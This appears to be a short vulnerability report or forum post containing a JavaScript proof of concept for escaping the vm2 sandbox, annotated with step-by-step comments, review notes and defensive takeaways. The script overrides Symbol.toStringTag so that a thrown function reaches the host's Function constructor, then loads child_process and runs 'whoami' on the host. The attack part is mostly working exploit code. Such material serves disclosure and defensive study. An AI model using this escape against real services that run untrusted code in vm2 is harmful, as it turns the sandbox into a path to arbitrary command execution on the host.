I looked at the code again and found that the following script
// Proof of concept from a vm2 sandbox-escape report. It serialises a function to
// source text, runs that text with `new VM().run(...)`, and prints the result.
// The affected vm2 version is not stated on this page.
//
// Reading the result:
//   - Output is the host account name: the sandboxed code reached the host's
//     `process` object and `child_process`, i.e. the sandbox did not contain it.
//   - Output is an error object: the run ended in the outer catch below.
//     NOTE(review): expected on a build where this report is fixed - confirm.
//
// Defensive takeaways:
//   - Do not treat an in-process JavaScript sandbox as the only boundary for
//     untrusted code; run it in a separate low-privilege process or container.
//   - A Node service that never shells out should not spawn child processes, so
//     unexpected process creation under it is a useful detection signal.
"use strict";
const {VM} = require('vm2');
// `untrusted` is the text "(" + <function source> + ")()", so the function below
// is invoked inside the sandbox, not in this host scope. Comments are kept out of
// its body on purpose: they would become part of the stringified source.
//
// What the sandboxed function does, in order:
//   1. Replaces the global `Symbol` with a plain object whose `toStringTag`
//      getter throws an arrow function.
//   2. Calls `Buffer.from(new Map())` inside a try block.
//      NOTE(review): presumably the host-side Buffer implementation reads
//      `Symbol.toStringTag` while inspecting its argument, which fires the
//      getter - confirm against the vm2 and Node versions in use.
//   3. In the catch, resets `Symbol`, calls the caught value with an empty arrow
//      function, and uses the returned object's `mainModule.require` to load
//      `child_process` and run `whoami`.
//      NOTE(review): this only works if the value that arrives in the catch lets
//      `.constructor` resolve to the host's Function; the bridge code that would
//      allow that is not visible here - confirm in vm2's exception handling.
const untrusted = '(' + function(){
Symbol = {
get toStringTag(){
throw f=>f.constructor("return process")()
}
};
try{
Buffer.from(new Map());
}catch(f){
Symbol = {};
return f(()=>{}).mainModule.require("child_process").execSync("whoami").toString();
}
}+')()';
// Host side: run the payload in a default-configured VM and log whatever comes
// back, either the returned string or the error thrown by run().
try{
console.log(new VM().run(untrusted));
}catch(x){
console.log(x);
}
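will break out of the VM sandbox: the `whoami` command is executed by the host process instead of being confined to the sandbox.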